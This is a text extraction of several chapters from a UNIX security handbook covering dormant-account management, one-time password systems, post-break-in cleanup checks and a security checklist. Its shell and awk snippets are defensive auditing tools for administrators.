mary:fdfdi3k1j$:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

to this:<br />

mary:fdfdi3k1j$:105:100:Mary Sue Lewis:/u/mary:/etc/disabled<br />

You would then create a shell script called /etc/disabled:<br />

#!/bin/sh<br />

/bin/echo Your account has been disabled because you seem to have<br />

/bin/echo forgotten about it. If you want your account back, please<br />

/bin/echo call Jay at 301-555-1234.<br />

/bin/sleep 10<br />

When Mary tries to log in, this is what she will see:<br />

bigblu login: mary<br />

password: mary1234<br />

Last login: Sun Jan 20 12:10:08 on ttyd3<br />

Whammix V17.1 ready to go!<br />

Your account has been disabled because you seem to have<br />

forgotten about it. If you want your account back, please<br />

call Jay at 301-555-1234.<br />

bigblu login:<br />

NOTE: Most versions of the ftpd FTP daemon will block access for users who have shells that are not listed in the file<br />

/etc/shells. Some versions, though, will not. You should check your FTP daemon for this behavior. If it does not block<br />

access, you may wish to change both the password and the shell to disable an account.<br />

8.4.3 Finding Dormant Accounts<br />

Accounts that haven't been used for an extended period of time are a potential security problem. They may belong to someone who<br />

has left or is on extended leave, and therefore the account is unwatched. If the account is broken into or the files are otherwise<br />

tampered with, the legitimate user might not take notice for some time to come. Therefore, disabling dormant accounts is good<br />

policy.<br />

One way to disable accounts automatically when they become dormant (according to your definition of dormant) is to set a dormancy<br />

threshold on the account. Under System VR4, you can do this with the -f option to the usermod command:<br />

# usermod -f 10 spaf<br />

In this example, user spaf will have his account locked if a login is not made at least once during any 10-day period. (Note that<br />

having an active session continue operation during this interval is not sufficient - the option requires a login.)<br />

If your version of <strong>UNIX</strong> is not SVR4 and does not have something equivalent, you will need to find another way to identify dormant<br />

accounts. Below is a simple shell script called not-this-month, which uses the last command to produce a list of the users who haven't<br />

logged in during the current month. Run it the last day of the month to produce a list of accounts that you may wish to disable:<br />

#!/bin/sh<br />

#<br />

# not-this-month:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_04.htm (2 of 4) [2002-04-12 10:44:30]


# Gives a list of users who have not logged in this month.<br />

#<br />

PATH=/bin:/usr/bin;export PATH<br />

umask 077<br />

THIS_MONTH=`date | awk '{print $2}'`<br />

/bin/last | /bin/grep $THIS_MONTH | awk '{print $1}' | /bin/sort -u > /tmp/users1$$<br />

cat-passwd | /bin/awk -F: '{print $1}' | /bin/sort -u > /tmp/users2$$<br />

/bin/comm -13 /tmp/users[12]$$<br />

/bin/rm -f /tmp/users[12]$$<br />

The following explains the details of this shell script:<br />

umask 077<br />

Sets the umask value so that other users on your system will not be able to read the temporary files in /tmp.<br />

PATH = /bin:/usr/bin<br />

Sets up a safe path.<br />

THIS_MONTH=`date | awk "{print $2}"`<br />

last<br />

[Chapter 8] 8.4 Managing Dormant Accounts<br />

Sets the shell variable THIS_MONTH to be the name of the current month.<br />

Generates a list of all of the logins on record.<br />

| grep $THIS_MONTH<br />

Filters the above list so that it includes only the logins that happened this month.<br />

| awk '{print $1}'<br />

Selects out the login name from the above list.<br />

| sort -u<br />

Sorts the list of logins alphabetically, and removes multiple instances of account names.<br />

cat -passwd | awk -F: '{print $1}'<br />

comm -13<br />

Generates a list of the usernames of every user on the system.[4]<br />

[4] Recall that we told you earlier that we would define cat-passwd to be the system-specific set of commands to<br />

print the contents of the password file.<br />

Prints items present in the second file, but not the first: the names of accounts that have not been used this month.<br />

This shell script assumes that the database used by the last program has been kept for at least one month.<br />

After you have determined which accounts have not been used recently, consider disabling them or contacting their owners. Of<br />

course, do not disable accounts such as root, bin, uucp, and news that are used for administrative purposes and system functions. Also<br />

remember that users who only access their account with the rsh (the remote shell command) or su commands won't show up with the<br />

last command.<br />

End Historical Accounts!<br />

We have seen cases where systems had account entries in the password file for users who had left the organization years before and<br />

had never logged in since. In at least one case, we saw logins for users that had not been active for more than three years, but the<br />

accounts had ever-expanding mailboxes from system-wide mail and even some off-site mailing lists! The problem was that the policy<br />

for removing accounts was to leave them until someone told the admin to delete them - something often overlooked or forgotten.<br />

The easiest way to eliminate these historically dormant accounts on your system is to create every user account with a fixed<br />

expiration time. Users of active accounts should be required to renew their accounts periodically. In this way, accounts that become<br />

dormant will automatically expire if not renewed and they don't become a liability.<br />

Under SVR4, you can do this with the usermod command:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_04.htm (3 of 4) [2002-04-12 10:44:30]


[Chapter 8] 8.4 Managing Dormant Accounts<br />

# usermod -e 12/31/97 spaf<br />

Other systems may have a method of doing this. If nothing else, you can add an entry to the crontab to mail you a reminder to disable<br />

an account when it expires. You must couple this with periodic scans to determine which accounts are inactive, and then remove<br />

them from the system (after archiving them to offline storage, of course).<br />

By having users renew their accounts periodically, you can verify that they still need the resources and access you have allocated.<br />

You can also use the renewal process as a trigger for some user awareness training.<br />

NOTE: In most environments, the last program only reports logins and logouts on the computer running it. Therefore,<br />

this script will not report users who have used other computers that are on the network, but have not used the computer<br />

on which the script is being run.<br />

Discovering dormant accounts in a networked environment can be a challenging problem. Instead of looking at<br />

login/logout log files, you may wish to examine other traces of user activity, such as the last time that email was sent or<br />

read, or the access times on the files in a user's home directory.<br />

8.3 Restricting Logins 8.5 Protecting the root<br />

Account<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_04.htm (4 of 4) [2002-04-12 10:44:30]


[Chapter 8] 8.7 One-Time Passwords<br />

Chapter 8<br />

Defending Your Accounts<br />

8.7 One-Time Passwords<br />

If you manage computers that people will access over the <strong>Internet</strong> or other computer networks, then you<br />

should seriously consider implementing some form of one-time password system. Otherwise, an attacker<br />

can eavesdrop on your legitimate users, capture their passwords, and use those passwords again at a later<br />

time.<br />

Is such network espionage likely? Absolutely. In recent years, people have broken into computers on key<br />

networks throughout the <strong>Internet</strong> and have installed programs called password sniffers (illustrated in<br />

Figure 8.2). These programs monitor all information sent over a local area network and silently record<br />

the first 20, 50 or 128 characters sent over each network connection.[12] In at least one case, a password<br />

sniffer captured tens of thousands of passwords within the space of a few weeks before the sniffer was<br />

noticed; the only reason the sniffer's presence was brought to the attention of the authorities was because<br />

the attacker was storing the captured passwords on the compromised computer's hard disk. Eventually,<br />

the hard disk filled up, and the computer crashed!<br />

[12] Some sniffers have been discovered "in the wild" that record 1024 characters, or even<br />

the entire Telnet session. Sniffers have also recorded FTP and NFS transactions.<br />

Figure 8.2: Password sniffing<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (1 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

One-time passwords,[13] as their name implies, are passwords which can be used only once, as we<br />

explained in Chapter 3, Users and Passwords. They are one of the only ways of protecting against<br />

password sniffers.<br />

[13] Encryption offers another solution against password sniffing, although it is harder to<br />

implement in practice because of the need for compatible software on both sides of the<br />

network connection.<br />

Another application which demands one-time passwords is mobile network computing, where the<br />

connection between computers is established over a radio channel. When radio is used, passwords are<br />

literally broadcast through the air, available for capture by anybody with a radio receiver. One way to<br />

ensure that a computer account will not be compromised is to make sure that a password, after<br />

transmittal, can never be used again.<br />

There are many different one-time password systems available. Some of them require that the user carry<br />

a hardware device, such as a smart card or a special calculator. Others are based on cryptography, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (2 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

require that the user run special software. Still others are based on paper. Figure 8.3, Figure 8.4, and<br />

Figure 8.5 show three commonly used systems; we'll describe them briefly in the following sections.<br />

8.7.1 Integrating One-time Passwords with <strong>UNIX</strong><br />

In general, you do not need to modify existing software to use these one-time password systems. The<br />

simplest way to use them is to replace the user's login shell (as represented in the /etc/passwd file; see<br />

"Changing the Account's Login Shell") with a specialized program to prompt for the one-time password.<br />

If the user enters the correct password, the program then runs the user's real command interpreter. If an<br />

incorrect password is entered, the program can exit, effectively logging the user out. This puts two<br />

passwords on the account - the traditional account password, followed by the one-time password.<br />

For example, here is an /etc/passwd entry for an account to which a <strong>Sec</strong>urity Dynamics <strong>Sec</strong>urID card key<br />

will be required to log in (see the next section):<br />

tla:TcHypr3FOlhAg:237:20:Ted L. Abel:/u/tla:/usr/local/etc/sdshell<br />

If you wish to use this technique, you must be sure that users cannot use the chsh program to change their<br />

shell back to a program such as /bin/shwhich does not require one-time passwords.<br />

A few versions of <strong>UNIX</strong> allow the system administrator to specify a program (or series of programs) to<br />

be used instead of, or in addition to, the standard password authentication. In these systems, the<br />

program(s) are run, one after another, and their return codes are examined. If any exit with an error code,<br />

the login is refused. AIX is one such system, and future versions of Solaris are slated to include such<br />

functionality.<br />

NOTE: There are many ways to gain access to a <strong>UNIX</strong> system that do not involve running a<br />

shell, such as FTP and NFS. If you use a special shell to implement one-time-passwords,<br />

these methods of access will not use the alternative authentication system unless they are<br />

specifically modified. You may wish to disable them if you are unable to replace them with<br />

versions that use the alternate authentication mechanism.<br />

8.7.2 Token Cards<br />

One method is to use some form of token-based password generator. In this scheme, the user has a small<br />

card or calculator with a built-in set of pre-programmed authentication functions and a serial number. To<br />

log in to the host, the user must use the card, in conjunction with a password, to determine the one-time<br />

password. Each time the user needs to use a password, the card is consulted to generate one. Each use of<br />

the card requires a password known to the user so that the card cannot be used by anyone stealing it.<br />

The approach is for the card to have some calculation based on the time and a secret function or serial<br />

number. The user reads a number from a display on the card, combines it with a password value, and<br />

uses this as the password. The displayed value on the card changes periodically, in a non-obvious<br />

manner, and the host will not accept two uses of the same number within this interval.<br />

The <strong>Sec</strong>urID shown in Figure 8.3 is one of the best-known examples of a time-based token. One version<br />

of the <strong>Sec</strong>urID card is based on a patented technology to display a number that changes every 30-90<br />

seconds. The number that is displayed is a function of the current time and date, and the ID of that<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (3 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

particular card, and is synchronized with the server. Another version has a keypad which is used to enter<br />

a personal identification number (PIN) code. (Without the keypad, a password must be sent, and this<br />

password is vulnerable to eavesdropping.) The fob version shown in the figure provides stronger<br />

packaging; it's especially good for people who don't carry wallets or handbags, and carry the device in a<br />

pocket. The cards are the size of a credit card and have a small LCD window to display the output.<br />

Figure 8.3: <strong>Sec</strong>urity Dynamics SECURID cards and fob<br />

A second approach taken with tokens is to present the user with a challenge at login. The <strong>Sec</strong>ureNet key<br />

shown in Figure 8.4 is a token that implements a simple, but secure, challenge-response system. Unlike<br />

the <strong>Sec</strong>urity Dynamics products, the <strong>Sec</strong>ureNet key does not have an internal clock. To log in, the user<br />

contacts the remote machine, which displays a number as a challenge. The user types the challenge<br />

number into the card, along with its PIN. The key calculates a response and displays it. The user then<br />

types the response into the remote computer as her one-time password. The <strong>Sec</strong>ureNet key can be<br />

programmed to self-destruct if an incorrect password is entered more than a predefined number of times.<br />

Figure 8.4: Digital Pathways <strong>Sec</strong>ureNet key card<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (4 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

There are many other vendors of one-time tokens, but the ideas behind their products are all basically the<br />

same. Some of these systems also can provide interesting add-on features, such as a duress code. If the<br />

user is being coerced to enter the correct password with the card value, he can enter a different password<br />

that will allow limited access, but will also trigger a remote alarm to notify management that something<br />

is wrong.<br />

There are two common drawbacks of these systems: the cards tend to be a bit fragile, and they have<br />

batteries that eventually discharge. The cost-per-unit may be a significant barrier for an organization that<br />

doesn't have an appropriate budget for security (but they are cheaper than many major break-ins!). And<br />

the cards can be annoying, especially when you take 90 minutes to get to work, only to discover that you<br />

left your token card at home.<br />

However, the token approach does work reliably and effectively. The vendors of these systems typically<br />

provide packages that easily integrate them into programs such as /bin/login, as well as libraries that<br />

allow you to integrate these tokens into your own systems as well. Several major corporations and labs<br />

have used these systems for years. Tokens eliminate the risks of password sniffing. They cannot be<br />

shared like passwords. Indeed, the tokens do work as advertised - something that may make them well<br />

worth the cost involved.<br />

8.7.3 Code Books<br />

A second popular method for supplying one-time passwords is to generate a codebook of some sort. This<br />

is a list of passwords that are used, one at a time, and then never reused. The passwords are generated in<br />

some way based on a shared secret. This method is a form of one-time pad (see <strong>Sec</strong>tion 6.4.7, "An<br />

Unbreakable Encryption Algorithm").<br />

When a user wishes to log in to the system in question, the user either looks up the next password in the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (5 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

code book, or generates the next password in the virtual codebook. This password is then used as the<br />

password to give to the system. The user may also need to specify a fixed password along with the<br />

codebook entry.<br />

Codebooks can be static, in which case they may be printed out on a small sheet of paper to be carried by<br />

the user. Each time a password is used, the user crosses the entry off the list. After the list is completely<br />

used, the system administrator or user generates another list. Alternatively, the codebook entries can be<br />

generated by any PC the user may have (this makes it like a token-based system). However, this means<br />

that if the user is careless and leaves critical information on the PC (as in a programmed function key),<br />

anyone else with access to the PC may be able to log in as the user.<br />

One of the best known forms of codebook schemes is that presented by S/Key. S/Key is a one-time<br />

password system developed at Bellcore based on a 1981 article by Leslie Lamport. With the system, each<br />

user is given a mathematical algorithm, which is used to generate a sequence of passwords. The user can<br />

either run this algorithm on a portable computer when needed, or can print out a listing of "good<br />

passwords" as a paper codebook. Figure 8.5 shows such a list.<br />

Unfortunately, the developers of S/Key did not maintain the system or integrate it into freely<br />

redistributable versions of /bin/login, /usr/ucb/ftpd, and other programs that require user authentication.<br />

As a result, others undertook those tasks, and there are now a variety of S/Key implementations available<br />

on the <strong>Internet</strong>. Each of these has different features and functionality. We note the location of several of<br />

these systems in Appendix E, Electronic Resources.<br />

Figure 8.5: S/Key password printout<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (6 of 7) [2002-04-12 10:44:31]


[Chapter 8] 8.7 One-Time Passwords<br />

Kerberos and DCE: Alternatives to One-Time Passwords?<br />

Kerberos and DCE are two systems which allow workstations to authenticate themselves to services<br />

running on servers without ever sending a password in clear text over the network. At first glance, then,<br />

Kerberos and DCE appear immune to password sniffers. If used properly, they are so.<br />

Unfortunately, Kerberos and DCE have their drawbacks. The first is that both systems require<br />

modification to both the client and the server: you cannot connect to a Kerberos service from any<br />

workstation on the <strong>Internet</strong>. Instead, you can only use workstations that are specially configured to run<br />

the exact version of Kerberos or DCE which your server happens to use.<br />

A bigger problem, though, happens when users try to log into computers running Kerberos over the<br />

network. Take the example of an MIT professor, who wishes to access her MIT computer account from a<br />

colleague's computer at Stanford. In this case, the professor will sit down at the Stanford computer, telnet<br />

to the MIT computer, and type her password. As a result, her password will travel over the <strong>Internet</strong> in the<br />

clear on its way to the secure Kerberos workstation. In the process, it may be picked up by a password<br />

sniffer. The same could happen if she were using one of the many DCE implementations currently<br />

available.<br />

Of course, Kerberos isn't supposed to work in this manner. At Stanford, the MIT professor is supposed to<br />

be able sit down at a Kerberos-equipped workstation and use it to transmit an encrypted password over<br />

the <strong>Internet</strong> using the standard Kerberos encryption scheme. The problem, though, is that the workstation<br />

must be able to locate the Kerberos server at MIT to use it, which often requires prior setup. And the<br />

Kerberos- (or DCE-) equipped workstation, with compatible versions of the software, needs to be at<br />

Stanford in the first place. Thus, while Kerberos and DCE may seem as if they are alternatives to<br />

one-time passwords, they unfortunately are not in many real-world cases.<br />

The Kerberos system's biggest problem, though, is that it still allows users to pick bad passwords and to<br />

write them down.<br />

8.6 The <strong>UNIX</strong> Encrypted<br />

Password System<br />

8.8 Administrative<br />

Techniques for Conventional<br />

Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_07.htm (7 of 7) [2002-04-12 10:44:31]


[Chapter 24] 24.4 Cleaning Up After the Intruder<br />

Chapter 24<br />

Discovering a Break-in<br />

24.4 Cleaning Up After the Intruder<br />

If your intruder gained superuser access, or access to another privileged account such as uucp, he may have modified your<br />

system to make it easier for him to break in again in the future. In particular, your intruder may have:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Created a new account<br />

Changed the password on an existing account<br />

Changed the protections on certain files or devices<br />

Created SUID or SGID programs<br />

Replaced or modified system programs<br />

Installed a special alias in the mail system to run a program<br />

Added new features to your news or UUCP system<br />

Installed a password sniffer<br />

Stolen the password file for later cracking<br />

If the intruder committed either of the last two misdeeds, he'll now have access to a legitimate account and will be able to get<br />

back in no matter what other precautions are taken. You'll have to change all of the passwords on the system.<br />

After a successful break-in, you must perform a careful audit to determine the extent of the damage. Depending on the nature of<br />

the break-in, you'll have to examine your entire system. You may need to also examine other systems on your local net, or<br />

possibly the entire network (including routers and other network devices).<br />

Note that COPS and Tiger are helpful recovery tools, as are many commercial security toolkits, especially because they provide<br />

an automatic check of the suggestions we make in this chapter. Remember, though, that they too could be compromised, so fetch<br />

a new copy and work from there. COPS and Tiger assume the integrity of system executables, such as ls and find. We think they<br />

are best used in conjunction with an integrity checker such as Tripwire. (See Appendix E, Electronic Resources for how to obtain<br />

all of these packages.)<br />

The remainder of this chapter discusses in detail how to find out what an intruder may have done and how you should clean up<br />

afterwards.<br />

24.4.1 New Accounts<br />

After a break-in, scan the /etc/passwd file for newly created accounts. If you have made a backup copy of /etc/passwd, use diff to<br />

compare the two files. But don't let the automated check be a substitute for going through the /etc/passwd file by hand, because<br />

the intruder might have also modified your copy of the file or the diff program. (This is the reason it is advantageous to keep a<br />

second copy of the /etc/passwd file and all of your comparison tools on removable media like a floppy disk.)<br />

Delete any accounts that have been created by an intruder. You may wish to make a paper record of an account, before deleting<br />

it in case you wish to prosecute the intruder (assuming that you ever find the villain).<br />

Also, be sure to check that every line of the /etc/passwd file is in the proper format, and that no UID or password fields have<br />

been changed to unauthorized values. Remember, simply adding an extra colon to the /etc/passwd entry for root can do the same<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_04.htm (1 of 4) [2002-04-12 10:44:32]


[Chapter 24] 24.4 Cleaning Up After the Intruder<br />

amount of damage as removing the superuser's password entirely!<br />

The following awk command will print /etc/passwd entries that do not have seven fields, that specify the superuser, or that do<br />

not have a password:<br />

# cat-passwd | awk -F: 'NF != 7 || $3 == 0 || $2 == "" { print $1 " " $2 " " $3}'<br />

root xq7Xm0Tv 0<br />

johnson f3V6Wv/u 0<br />

sidney 104<br />

#<br />

This awk command sets the field separator to the colon (:), which matches the format of the /etc/passwd file. The awk command<br />

then prints out the first three fields (username, password, and UID) of any line in the /etc/passwd file that does not have seven<br />

fields, has a UID of 0, or has no password.<br />

In this example, the user johnson has had her UID changed to 0, making her account an alias for the superuser, and the user<br />

sidney has had his password removed.<br />

This automated check is much more reliable than a visual inspection, but make sure that the script that you use to run this<br />

automated check hasn't been corrupted by an attacker. One approach is to type the awk command each time you use it instead of<br />

embedding it in a shell script.[3]<br />

[3] Or use Tripwire.<br />

24.4.1.1 Changes in file contents<br />

An intruder who gains superuser privileges can change any file on your system. Although you should make a thorough inventory<br />

of your computer's entire filesystem, you should look specifically for any changes to the system that affect security. For<br />

example, an intruder may have inserted trap doors or logic bombs to do damage at a later point in time.<br />

One way to easily locate changes to system programs is to use the checklists described in Chapter 5, The <strong>UNIX</strong> Filesystem.<br />

24.4.1.2 Changes in file and directory protections<br />

After a break-in, review the protection of every critical file on your system. Intruders who gain superuser privileges may change<br />

the protections of critical files to make it easier for them to regain superuser access in the future. For example, an intruder might<br />

have changed the mode of the /bin directory to 777 to make it easier to modify system software in the future, or altered the<br />

protections on /dev/kmem so as to be able to modify system calls directly using a symbolic debugger.<br />

24.4.1.3 New SUID and SGID files<br />

Computer crackers who gain superuser access frequently create SUID and SGID files. After a break-in, scan your system to<br />

make sure that new SUID files have not been created. See the section <strong>Sec</strong>tion 5.5, "SUID" for information about how to do this.<br />

24.4.1.4 Changes in .rhosts files<br />

An intruder may have created new .rhosts files in your users' home directories, or may have modified existing .rhosts files. (The<br />

.rhosts file allows other users on the network to log into your account without providing a password. For more information, see<br />

Chapter 16.) After a break-in, tell your users to check their .rhosts files to make sure that none of these files have been modified.<br />

Chapter 16 also contains a shell script that you can use to get a list of every .rhosts file on the system. After a break-in, you may<br />

wish to delete every .rhosts file rather than take the chance that a file modified by the attacker won't be caught by the account's<br />

rightful owner. After all, the .rhosts file is simply a convenience, and your legitimate users can recreate their .rhosts files as<br />

necessary.[4]<br />

[4] At some sites, this may be a drastic measure, and might make some of your users very angry, so think it over<br />

carefully before taking this step. Alternatively, you could rename each .rhosts file to rhosts.old so that the file will<br />

not be used, and so that your users do not need to retype the entire file's contents.<br />

24.4.1.5 Changes to the /etc/hosts.equiv file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_04.htm (2 of 4) [2002-04-12 10:44:32]


[Chapter 24] 24.4 Cleaning Up After the Intruder<br />

An intruder may have added more machines to your /etc/hosts.equiv file, so be sure to check for changes to this file. Also, check<br />

your /etc/netgroups and /etc/exports files (or equivalent) if you are running NIS or NFS.<br />

24.4.1.6 Changes to startup files<br />

An intruder may have modified the contents of dot (.) files in your users' home directories. Instruct all of your users to check<br />

these files and report anything suspicious. You can force your users to check the files by renaming them to names like login.old,<br />

cshrc.old, and profile.old. Be sure to check the versions of those files belonging to the root user, and also check the /etc/profile<br />

file.<br />

If you are using sendmail, the attacker may have created or modified the .forward files so that they run programs when mail is<br />

received. This aspect is especially critical on nonuser accounts such as ftp and uucp.<br />

If you know the precise time that the intruder was logged in, you can list all of the dot files in users' home directories, sort the list<br />

by time of day, and then check them for changes. A simple shell script to use is shown below:<br />

#!/bin/ksh<br />

# Search for .files in home directories<br />

for user in $(cat-passwd | /bin/awk -F: "length($6) > 0 {print $6}")<br />

do<br />

for name in $user/.*<br />

do<br />

[[ $name == $user/.. ]] && continue<br />

[[ -f $name ]] && print "$name"<br />

done<br />

done | xargs ls -ltd<br />

However, using timestamps may not detect all modifications, as discussed at the end of this chapter. The -c and -l options to the<br />

ls command should be used to also check for modifications to permission settings, and to determine if the mtime was altered to<br />

hide a modification.<br />

Another approach is to sweep the entire filesystem with thefind command and observe what files and directories were accessed<br />

around the time of the intrusion. This may give you some clues as to what was done. For instance, if your compiler, loader, and<br />

libraries all show access times within a few seconds of each other, you can conclude that the intruder compiled something.<br />

If you decide to take this approach, we suggest that you first remount all your filesystems as read-only so that your examinations<br />

don't alter the saved filesystem dates and times.<br />

24.4.1.7 Hidden files and directories<br />

The intruder may have created a "hidden directory" on your computer, and be using it as a repository for stolen information or<br />

for programs that break security.<br />

On older <strong>UNIX</strong> systems, one common trick for creating a hidden directory was to unlink (as root) the ".." directory in a<br />

subdirectory and then create a new one. The contents of such a hidden directory are overlooked by programs such as find that<br />

search the filesystem for special files. Modern versions of <strong>UNIX</strong>, however, detect such hidden directories as inconsistencies<br />

when you run the /etc/fsck program. For this reason, be sure to run fsck on each filesystem as part of your routine security<br />

monitoring.<br />

On some HP-UX systems, intruders have stored their tools and files in a CDF (Context Dependent File) directory. On these<br />

systems, be sure to use the -H option to find and ls when you are looking for files that are out of place.<br />

Nowadays, intruders often hide their files in directories with names that are a little difficult to discover or enter on the command<br />

line. This way, a novice system administrator who discovers the hidden directory will be unlikely to figure out how to access its<br />

contents. Filenames that are difficult to discover or enter include ".." (dot dot space), control characters, backspaces, or other<br />

special characters.<br />

You can often discover hidden directories easily because they cause results that differ from those of normal directories. For<br />

example:<br />

prose% ls -l<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_04.htm (3 of 4) [2002-04-12 10:44:32]


[Chapter 24] 24.4 Cleaning Up After the Intruder<br />

drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar<br />

prose% cd foobar<br />

foobar: No such file or directory<br />

prose%<br />

In this case, the real name of the directory is foobar, with a space following the letter r. The easy way of entering filenames like<br />

this one is to use the shell's wildcard capability: The wildcard *ob* will match the directory foobar, no matter how many spaces<br />

or other characters it has in it, as long the letters o and b are adjacent.<br />

prose% ls -l<br />

drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar<br />

prose% cd *ob* prose%<br />

If you suspect that a filename has embedded control characters, you can use the cat -v command to determine what they are. For<br />

example:<br />

% ls -l<br />

total 1<br />

-rw-r--r-- 1 john 21 Mar 10 23:38 bogus?file<br />

% echo * | cat -v<br />

bogus^Yfile<br />

%<br />

In this example, the file bogus?file actually has a CTRL-Y character between the letters "bogus" and the letters "file". Some<br />

versions of the ls command print control characters as question marks (?). To see what the control character actually was,<br />

however, you must send the raw filename to the cat command, which is accomplished with the shell echo.<br />

If you are using the 93 version of the Korn shell, you can also list all the files in the local directory in a readable manner. This<br />

approach works even when your ls command has been replaced with an altered version:<br />

$ printf $'entry: %'' .* *<br />

entry: .<br />

entry: ..<br />

entry: $'..\n'<br />

entry: $'bogus\031file'<br />

entry: temp0001 entry: temp0002 $<br />

24.4.1.8 Unowned files<br />

Sometimes attackers leave files in the filesystem that are not owned by any user or group - that is, the files have a UID or GID<br />

that does not correspond to any entries in the /etc/passwd and /etc/group files. This can happen if the attacker created an account<br />

and some files, and then deleted the account - leaving the files. Alternatively, the attacker might have been modifying the raw<br />

inodes on a disk and changed a UID by accident.<br />

You can search for these files with the find command, as shown in the following example:<br />

# find / -nouser -o -nogroup -print<br />

Remember, if you are using NFS, you should instead run the following find command on each server:<br />

# find / \( -local -o -prune \) -nouser -o -nogroup -print<br />

You might also notice unowned files on your system if you delete a user from the /etc/passwd file but leave a few of that user's<br />

files on the system. It is a good idea to scan for unowned files on a regular basis, copy them to tape (in case they're ever needed),<br />

and then delete them from your system.<br />

24.3 The Log Files:<br />

Discovering an Intruder's<br />

Tracks<br />

24.5 An Example<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_04.htm (4 of 4) [2002-04-12 10:44:32]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

Appendix A<br />

A. <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

Contents:<br />

Preface<br />

This appendix summarizes the hints and recommendations made in this book. You can use this appendix<br />

as a reminder of things to examine and do, or you can use it as an index.<br />

A.1 Preface<br />

●<br />

●<br />

Reread your manuals and vendor documentation.<br />

Mark your calendar for 6-12 months in the future to reread your manuals, again.<br />

A.1.1 Chapter 1: Introduction<br />

●<br />

●<br />

●<br />

●<br />

Order other appropriate references on security and computer crime. Schedule time to read them<br />

when they arrive.<br />

Become familiar with your users' expectations and experience with <strong>UNIX</strong>.<br />

Write a letter to your vendors indicating your interest and concern about (insufficient) software<br />

quality and security features.<br />

Post a reminder above your computer or desk: "<strong>Sec</strong>urity is not `Me versus the Users' but `All of Us<br />

versus Them.'"<br />

A.1.1.1 Chapter 2: Policies and Guidelines<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Assess your environment. What do you need to protect? What are you protecting against?<br />

Understand priorities, budget, and resources available.<br />

Perform a risk assessment and cost-benefit analysis.<br />

Get management involved.<br />

Set priorities for security and use.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (1 of 21) [2002-04-12 10:44:33]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Develop a positive security policy. Circulate it to all users.<br />

Ensure that authority is matched with responsibility.<br />

Ensure that everything to be protected has an "owner."<br />

Work to educate your users on good security practice.<br />

Don't have different, less secure rules for top-level management.<br />

A.1.1.2 Chapter 3: Users and Passwords<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Be sure that every person who uses your computer has his or her own account.<br />

Be sure that every user's account has a password.<br />

After you change your password, $don't forget it!<br />

After you change your password, test it with the su command, by trying to log in on another<br />

terminal, or by using the telnet localhost command.<br />

Pick strong, nonobvious passwords.<br />

Consider automatic generation or screening of passwords.<br />

Pick passwords that are not so difficult to remember that you have to write them down.<br />

If you must write down your password, don't make it obvious that what you have written is, in fact,<br />

a password. Do not write your account name or the name of the computer on the same piece of<br />

paper. Do not attach your password to your terminal, keyboard, or any part of your computer.<br />

Never record passwords online or send them to another user via electronic mail.<br />

Don't use your password as the password to another application such as a Multi-User Dungeon<br />

(MUD) game.<br />

Don't use your password on other computer systems under different administrative control.<br />

Consider use of one-time passwords, tokens, or smart cards.<br />

Ensure that all users know about good password management practices.<br />

A.1.1.3 Chapter 4: Users, Groups, and the Superuser<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Ensure that no two regular users are assigned or share the same account.<br />

Never give any users, other than UUCP users, the same UID.<br />

Think about how you can assign group IDs to promote appropriate sharing and protection without<br />

sharing accounts.<br />

Avoid use of the root account for routine activities that can be done under a plain user ID.<br />

Think of how to protect especially sensitive files in the event that the root account is<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (2 of 21) [2002-04-12 10:44:34]


